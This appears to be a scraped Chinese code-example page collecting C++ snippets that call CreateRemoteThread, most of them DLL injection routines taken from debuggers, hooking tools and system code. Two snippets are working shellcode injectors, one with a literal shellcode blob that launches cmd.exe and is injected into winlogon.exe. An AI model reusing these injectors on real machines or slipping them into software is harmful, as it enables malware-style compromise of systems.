自学教程：C++ CreateRemoteThread函数代码示例

int InjectDLL(char *dll, int ProcessID) {	HANDLE Proc, RemoteThread;	LPVOID RemoteStringPtr, LoadLibAddr;	int writeProcError;	if(!ProcessID) {		return 1;	}	Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);	if(!Proc) {		return 2;	}	LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");	if (LoadLibAddr == NULL) {		return 3;	}	RemoteStringPtr = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(dll), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);	if (RemoteStringPtr == NULL) {		return 4;	}	writeProcError = WriteProcessMemory(Proc, (LPVOID)RemoteStringPtr, dll, strlen(dll), NULL);	if (writeProcError == 0) {		return 5;	}	RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, (LPVOID)RemoteStringPtr, NULL, NULL);	if (RemoteThread == NULL) {		return 6;	}	CloseHandle(Proc);	return 0;}

//-----------------------------------------------------------------------------// Name: Execute// Object: execute RemoteProcFuncAddress proc in remote process (blocking call : function will not return until thread as finished)//         Use this function if you don't have injected code (func already exist in remote process)//         WARNING A DIRECT CALL WILL WORK ONLY FOR FUNC HAVING 1 PARAMETER AND IF THIS PARAMETER IS A POINTER//         else you have to do code injection like done in RemoteGetProcAddress, RemoteGetModuleHandleThreadProc//         RemoteFreeLibrary// Parameters ://     in  : FARPROC RemoteProcFunc : remote address of the proc func to execute//     out : LPDWORD lpExitCode : exit code of TreadProc//     return : FALSE on error//-----------------------------------------------------------------------------BOOL CCodeInject::Execute(FARPROC RemoteProcFuncAddress,LPDWORD lpExitCode){    HANDLE       hThread = NULL; // the handle to the thread executing the remote copy of ThreadProc;    DWORD        dwThreadId = 0;    if (IsBadWritePtr(lpExitCode,sizeof(DWORD)))        return FALSE;    *lpExitCode=0;    // Start execution of remote ThreadProc    hThread = CreateRemoteThread(this->hProcess,                                NULL,                                0,                                (LPTHREAD_START_ROUTINE) RemoteProcFuncAddress,                                this->pDataRemote,                                0,                                &dwThreadId                                );    if (!hThread)        return FALSE;    // wait for end of thread    if (WaitForSingleObject(hThread, INFINITE)!=WAIT_OBJECT_0)    {        CloseHandle(hThread);        return FALSE;    }    GetExitCodeThread(hThread, lpExitCode);    CloseHandle(hThread);    return TRUE;}

// TODO: comment.BOOL RemoteSynchronousCall(HANDLE process, LPVOID function, LPVOID argument, LPDWORD result) {  LPTHREAD_START_ROUTINE routine = static_cast<LPTHREAD_START_ROUTINE>(static_cast<LPVOID>(function));  ScopedHandle thread(CreateRemoteThread(process, NULL, 0, routine, argument, 0, NULL));  if(thread.handle == NULL) {    THROW_ERROR("Unable to create a thread in the remote process!");    return FALSE;  }  DWORD event = WaitForSingleObject(thread.handle, INFINITE);  if(event != WAIT_OBJECT_0) {    THROW_ERROR("Unable to wait for the thread to finish!");    return FALSE;  }  DWORD exit_code;  BOOL rv = GetExitCodeThread(thread.handle, &exit_code);  if(rv == FALSE) {    THROW_ERROR("Unable to get remote thread's exit code!");    return FALSE;  }  if(!thread.Close()) {    THROW_ERROR("Unable to close remote thread!");    return FALSE;  }  *result = exit_code;  return TRUE;}

int main() {    STARTUPINFO si;    PROCESS_INFORMATION pi;    memset(&si, 0, sizeof(si));    memset(&pi, 0, sizeof(pi));    CreateProcessW(PROC_NAME, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);    HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");    LPTHREAD_START_ROUTINE pLoadLibraryW =    	(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");    SIZE_T dwLength = (wcslen(DLL_NAME) + 1) * 2;    LPVOID lpLibName = VirtualAllocEx(pi.hProcess, NULL, dwLength, MEM_COMMIT, PAGE_READWRITE);    SIZE_T written = 0;    WriteProcessMemory(pi.hProcess, lpLibName, DLL_NAME, dwLength, &written);    HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, NULL, pLoadLibraryW, lpLibName, NULL, NULL);    WaitForSingleObject(hThread, INFINITE);    CloseHandle(hThread);    ResumeThread(pi.hThread);    VirtualFreeEx(pi.hProcess, lpLibName, dwLength, MEM_RELEASE);    CloseHandle(pi.hProcess);    CloseHandle(pi.hThread);    return 0;}

bool LoadRemoteDll(DWORD pid, const char* dllPath){	HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);	if (hProc == NULL)		return false;	PVOID p = VirtualAllocEx(hProc, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);	DWORD l;	BOOL r = WriteProcessMemory(hProc, p, dllPath, strlen(dllPath) + 1, &l);	if (!r) {		VirtualFreeEx(hProc, p, strlen(dllPath) + 1, MEM_RELEASE);		return false;	}	HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, 		(LPTHREAD_START_ROUTINE )GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA"), 		p, 0, &l);	VirtualFreeEx(hProc, p, strlen(dllPath) + 1, MEM_RELEASE);	if (hThread == NULL) {		return false;	}	WaitForSingleObject(hThread, INFINITE);	GetExitCodeThread(hThread, &l);	CloseHandle(hThread);	return l != 0;}

/*	Unload Dll from process	RETURN:		Error code*/DWORD CMemDll::Unload(){	HANDLE hThread = NULL;	HMODULE hDll = NULL;    if(!CMemCore::Instance().m_hProcess)        return ERROR_INVALID_HANDLE;	//Search for dll in process	if((hDll = (HMODULE)GetModuleAddress(GetProcessId(CMemCore::Instance().m_hProcess), TEXT(DLL_NAME))) !=0 )	{		hThread = CreateRemoteThread			(				CMemCore::Instance().m_hProcess, 				NULL, 0, 				(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "FreeLibrary"), 				(void*)hDll, 				0, NULL			);		if(hThread == NULL)		{			MessageBox(NULL, TEXT("Cannot create thread"), TEXT("Error"), MB_ICONERROR);			return GetLastError();		}		//Wait for completion		WaitForSingleObject(hThread, INFINITE);		CloseHandle(hThread);	}    return ERROR_SUCCESS;}

NTSTATUSNTAPIBaseCreateThreadPoolThread(IN PTHREAD_START_ROUTINE Function,                           IN PVOID Parameter,                           OUT PHANDLE ThreadHandle){    NTSTATUS Status;    /* Create a Win32 thread */    *ThreadHandle = CreateRemoteThread(NtCurrentProcess(),                                       NULL,                                       0,                                       Function,                                       Parameter,                                       CREATE_SUSPENDED,                                       NULL);    if (!(*ThreadHandle))    {        /* Get the status value if we couldn't get a handle */        Status = NtCurrentTeb()->LastStatusValue;        if (NT_SUCCESS(Status)) Status = STATUS_UNSUCCESSFUL;    }    else    {        /* Set success code */        Status = STATUS_SUCCESS;    }    /* All done */    return Status;}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {	int nArgs;	LPWSTR* lpszArgs = CommandLineToArgvW(GetCommandLineW(), &nArgs);	int showHelp = (nArgs < 2);	int showAttachNotification = 0;	LPWSTR lpszTargetCmd = NULL;	int posArg = 0;	while (++posArg < nArgs) {		if (!wcscmp(lpszArgs[posArg], L"/?")) {			showHelp = 1;			break;		} else if (!wcscmp(lpszArgs[posArg], L"/M")) {			showAttachNotification = 1;		} else {			size_t cbTargetArgs = strlen(lpCmdLine) * sizeof(wchar_t);			lpszTargetCmd = (wchar_t*) malloc(cbTargetArgs);			memset(lpszTargetCmd, 0, cbTargetArgs);			wchar_t* lpszTargetTemp = lpszTargetCmd;			size_t nArgLength = 0;			for (int i = posArg; i < nArgs; i++) {				nArgLength = wcslen(lpszArgs[i]);				wcscpy(lpszTargetTemp, lpszArgs[i]);				if (posArg < nArgs-1) {					lpszTargetTemp += wcslen(lpszArgs[i]);					wcscpy(lpszTargetTemp, L" ");					lpszTargetTemp++;				}			}			break;		}	}	if (showHelp) {		MessageBox(0, L"ReLocale by kolpazar/n/nUsage: ReLocale [opts] exe [args]/n/nOpts:/n/M Display a message after hooking/n/? Display this window", L"ReLocale", MB_OK);		return 0;	}	if (showAttachNotification) {		SetEnvironmentVariable(k_lpAttachNotification, L"1");	}	STARTUPINFO si;	PROCESS_INFORMATION pi;	ZeroMemory(&si, sizeof(STARTUPINFO));	si.cb = sizeof(STARTUPINFO);	CreateProcess(NULL, lpszTargetCmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_SUSPENDED, FALSE, NULL, &si, &pi);		char szHookLibrary[MAX_PATH];#ifndef _M_AMD64	strcpy((char*) &szHookLibrary, "ReLocaleHook.dll");#else	strcpy((char*) &szHookLibrary, "ReLocaleHook64.dll");#endif	LPVOID lpProcessMem = VirtualAllocEx(pi.hProcess, NULL, sizeof(szHookLibrary), MEM_COMMIT, PAGE_READWRITE);	WriteProcessMemory(pi.hProcess, lpProcessMem, &szHookLibrary, sizeof(szHookLibrary), NULL);	HANDLE hDllThread = CreateRemoteThread(pi.hProcess, NULL, 0, 		(LPTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"), lpProcessMem, 0, NULL);	WaitForSingleObject(hDllThread, INFINITE);	ResumeThread(pi.hThread);	return 0;}

VOID InjectCreateProcess(PCHAR pName, PCHAR pDllName, PCHAR pCmdArg){    STARTUPINFOA si;    PROCESS_INFORMATION pi;    ULONG_PTR dwAddr;    HANDLE hThread;    HMODULE hKernel32;    CHAR CurrentPath[MAX_PATH ];    if (!GetCurrentDirectory(sizeof(CurrentPath) - 1, CurrentPath)) {        printf("[-] InjectCreateProcess - GetCurrentDirectory failed : %lu/n", GetLastError());        return;    }    hKernel32 = GetModuleHandleA("kernel32.dll");    memset(&si, 0, sizeof(STARTUPINFO));    si.cb = sizeof(STARTUPINFO);    memset(&pi, 0, sizeof(PROCESS_INFORMATION));    if (!CreateProcessA(pName, pCmdArg, NULL, NULL, FALSE, CREATE_SUSPENDED, GetEnvironmentStrings(), CurrentPath, &si, &pi)) {        printf("[-] InjectCreateProcess - CreateProcessA() failed : %lu/n", GetLastError());        exit(EXIT_FAILURE);    }    dwAddr = (ULONG_PTR)VirtualAllocEx(pi.hProcess, 0, strlen(pDllName) + 1, MEM_COMMIT, PAGE_READWRITE);    if ((LPVOID)dwAddr == NULL) {        printf("[-] InjectCreateProcess - VirtualAllocEx failed() : %lu/n", GetLastError());        TerminateProcess(pi.hProcess, 42);        exit(EXIT_FAILURE);    }    WriteProcessMemory(pi.hProcess, (LPVOID)dwAddr, (void*)pDllName, strlen(pDllName) + 1, NULL);    hThread = CreateRemoteThread(pi.hProcess, NULL, 0,                                 (LPTHREAD_START_ROUTINE) GetProcAddress(hKernel32,"LoadLibraryA"),                                 (LPVOID)dwAddr, 0, NULL);    WaitForSingleObject(hThread, INFINITE);    ResumeThread(pi.hThread);    CloseHandle(hThread);}

bool CUtils::InjectLibraryIntoProcess(HANDLE hProcess, char * szLibPath){	bool bReturn = true;	size_t sLibraryPathLen = (strlen(szLibPath) + 1);	void * pRemoteLibraryPath = VirtualAllocEx(hProcess, NULL, sLibraryPathLen, MEM_COMMIT, PAGE_READWRITE);	SIZE_T sBytesWritten = 0;	WriteProcessMemory(hProcess, pRemoteLibraryPath, (void *)szLibPath, sLibraryPathLen, &sBytesWritten);	if(sBytesWritten != sLibraryPathLen) 	{		bReturn = false;	} else {		HMODULE hKernel32 = GetModuleHandle("Kernel32");		FARPROC pfnLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA");		HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pfnLoadLibraryA, pRemoteLibraryPath, 0, NULL);				if(hThread) 		{			WaitForSingleObject(hThread, INFINITE);			CloseHandle(hThread);		} else {			bReturn = false;		}	}	VirtualFreeEx(hProcess, pRemoteLibraryPath, sizeof(pRemoteLibraryPath), MEM_RELEASE);	return bReturn;}

int InjectDLL(HANDLE hProcess, TCHAR *szDllPath){	int szDllPathLen = lstrlen(szDllPath) + 1;	PWSTR RemoteProcessMemory = (PWSTR)VirtualAllocEx(hProcess, 		NULL, szDllPathLen, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);	if(RemoteProcessMemory == NULL)		return -1;		BOOL bRet = WriteProcessMemory(hProcess, 		RemoteProcessMemory, (PVOID)szDllPath, szDllPathLen, NULL);	if(bRet == FALSE)		return -1;		PTHREAD_START_ROUTINE pfnThreadRtn;	pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress(		GetModuleHandle("kernel32"), "LoadLibraryA");	if(pfnThreadRtn == NULL)		return -1;		HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, 		pfnThreadRtn, RemoteProcessMemory, 0, NULL);	if(hThread == NULL)		return -1;	WaitForSingleObject(hThread, INFINITE);		VirtualFreeEx(hProcess, 		RemoteProcessMemory, szDllPathLen, MEM_RELEASE);	CloseHandle(hThread);	return 0;}

bool injectDLL(HANDLE process, const wchar_t* dllName){	LPVOID loadLibAddress = GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryW");	LPVOID nameAddress = loadStringToMemory(process, dllName);	if (!nameAddress || !loadLibAddress)		return false;	HANDLE creationThread = CreateRemoteThread(process, NULL, NULL,												static_cast<LPTHREAD_START_ROUTINE>(loadLibAddress),												nameAddress, NULL, NULL);		if (creationThread)	{		WaitForSingleObject(creationThread, INFINITE);				DWORD ret;		GetExitCodeThread(creationThread, &ret);		CloseHandle(creationThread);				return (ret != NULL);	}	else		return false;}

void inject(DWORD pid){	HANDLE phd,h;	LPVOID shell;		phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);		if(phd==INVALID_HANDLE_VALUE)	{		printf("/nOpenProcess() Failed."); return ;	}		shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);	if(shell==NULL)	{		printf("/nVirtualAllocEx() Failed");  CloseHandle(phd); return ;	}		WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);	printf("/nInjection successfull/n");	printf("Running Shellcode....../n");		h=CreateRemoteThread(phd,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);	if(h==NULL)	{		printf("Failed to Run Shellcode/n"); return ;	}	else		printf("shellcode Execution Successfull");}

bool DebugFrontend::ExecuteRemoteKernelFuntion(HANDLE process, const char* functionName, LPVOID param, DWORD& exitCode){    HMODULE kernelModule = GetModuleHandle("Kernel32");    FARPROC function = GetProcAddress(kernelModule, functionName);    if (function == NULL)    {        return false;    }    DWORD threadId;    HANDLE thread = CreateRemoteThread(process, NULL, 0,        (LPTHREAD_START_ROUTINE)function, param, 0, &threadId);    if (thread != NULL)    {                WaitForSingleObject(thread, INFINITE);        GetExitCodeThread(thread, &exitCode);                CloseHandle(thread);        return true;    }    else    {        return false;    }}

void Launch(){	void* pMem;	char shellcode[] =		"/xfc/xe8/x89/x00/x00/x00/x60/x89/xe5/x31/xd2/x64/x8b/x52/x30"		"/x8b/x52/x0c/x8b/x52/x14/x8b/x72/x28/x0f/xb7/x4a/x26/x31/xff"		"/x31/xc0/xac/x3c/x61/x7c/x02/x2c/x20/xc1/xcf/x0d/x01/xc7/xe2"		"/xf0/x52/x57/x8b/x52/x10/x8b/x42/x3c/x01/xd0/x8b/x40/x78/x85"		"/xc0/x74/x4a/x01/xd0/x50/x8b/x48/x18/x8b/x58/x20/x01/xd3/xe3"		"/x3c/x49/x8b/x34/x8b/x01/xd6/x31/xff/x31/xc0/xac/xc1/xcf/x0d"		"/x01/xc7/x38/xe0/x75/xf4/x03/x7d/xf8/x3b/x7d/x24/x75/xe2/x58"		"/x8b/x58/x24/x01/xd3/x66/x8b/x0c/x4b/x8b/x58/x1c/x01/xd3/x8b"		"/x04/x8b/x01/xd0/x89/x44/x24/x24/x5b/x5b/x61/x59/x5a/x51/xff"		"/xe0/x58/x5f/x5a/x8b/x12/xeb/x86/x5d/x6a/x01/x8d/x85/xb9/x00"		"/x00/x00/x50/x68/x31/x8b/x6f/x87/xff/xd5/xbb/xe0/x1d/x2a/x0a"		"/x68/xa6/x95/xbd/x9d/xff/xd5/x3c/x06/x7c/x0a/x80/xfb/xe0/x75"		"/x05/xbb/x47/x13/x72/x6f/x6a/x00/x53/xff/xd5/x63/x6d/x64/x2e"		"/x65/x78/x65/x00";	wchar_t* str = L"winlogon.exe";	DWORD PID = getProcessId(str);	HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);	pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);	DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);	HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);}

BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath){	HANDLE                  hProcess, hThread;	LPVOID                  pRemoteBuf;	DWORD                   dwBufSize = (DWORD)(_tcslen(szDllPath) + 1) * sizeof(TCHAR);	LPTHREAD_START_ROUTINE  pThreadProc;	if ( !(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)) )    {        printf("OpenProcess(%d) failed!!!/n", dwPID);		return FALSE;    }	pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize,                                 MEM_COMMIT, PAGE_READWRITE);	WriteProcessMemory(hProcess, pRemoteBuf,                        (LPVOID)szDllPath, dwBufSize, NULL);	pThreadProc = (LPTHREAD_START_ROUTINE)                  GetProcAddress(GetModuleHandle(L"kernel32.dll"),                                  "LoadLibraryW");	hThread = CreateRemoteThread(hProcess, NULL, 0,                                  pThreadProc, pRemoteBuf, 0, NULL);	WaitForSingleObject(hThread, INFINITE);		VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);	CloseHandle(hThread);	CloseHandle(hProcess);	return TRUE;}

/*********************************************************************** *           CreateThread   ([email
C++ CreateRenderTarget函数代码示例
C++ CreateQueue函数代码示例